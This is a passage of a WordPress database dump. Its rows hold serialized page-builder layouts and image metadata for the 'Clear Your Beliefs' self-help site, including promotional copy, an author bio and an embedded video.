(1058, 1558, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:850:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1237:"<div id="divStroke2" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1057, 1557, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:850:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1284:"<div id="divStroke2" style="padding-top: 25px; padding-bottom: 25px;"><p><b>What You Can Accomplish with <em>Clear Your Beliefs</em></b><br /> [su_row][su_column size="1/2"]</p><ul style="text-align: center;"><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li></ul><p>[/su_column]<br /> [su_column size="1/2"]</p><ul style="margin-top: -20px; text-align: center;"><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column]<br /> [/su_row]</p><p><b>How and Why It Works</b></p><ul><li>Beliefs are the major cause of upset and unhappiness</li><li>CYB clears beliefs at the core of the psyche, where they live</li><li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li><li>You take charge and decide what you want to believe</li><li>You’re guided gently, step-by-step, through the entire process</li><li>You decide how far to go, and what changes to make</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1059, 1559, '_wp_attached_file', '2014/10/btn_031.png'),
(1060, 1559, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:510;s:6:"height";i:90;s:4:"file";s:19:"2014/10/btn_031.png";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"btn_031-150x90.png";s:5:"width";i:150;s:6:"height";i:90;s:9:"mime-type";s:9:"image/png";}s:6:"medium";a:4:{s:4:"file";s:18:"btn_031-300x52.png";s:5:"width";i:300;s:6:"height";i:52;s:9:"mime-type";s:9:"image/png";}s:14:"category-thumb";a:4:{s:4:"file";s:18:"btn_031-220x90.png";s:5:"width";i:220;s:6:"height";i:90;s:9:"mime-type";s:9:"image/png";}s:15:"product-display";a:4:{s:4:"file";s:18:"btn_031-400x90.png";s:5:"width";i:400;s:6:"height";i:90;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:18:"btn_031-170x90.png";s:5:"width";i:170;s:6:"height";i:90;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1061, 1559, '_edit_lock', '1413852345:2'),
(1062, 1560, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:850:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1236:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:576:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
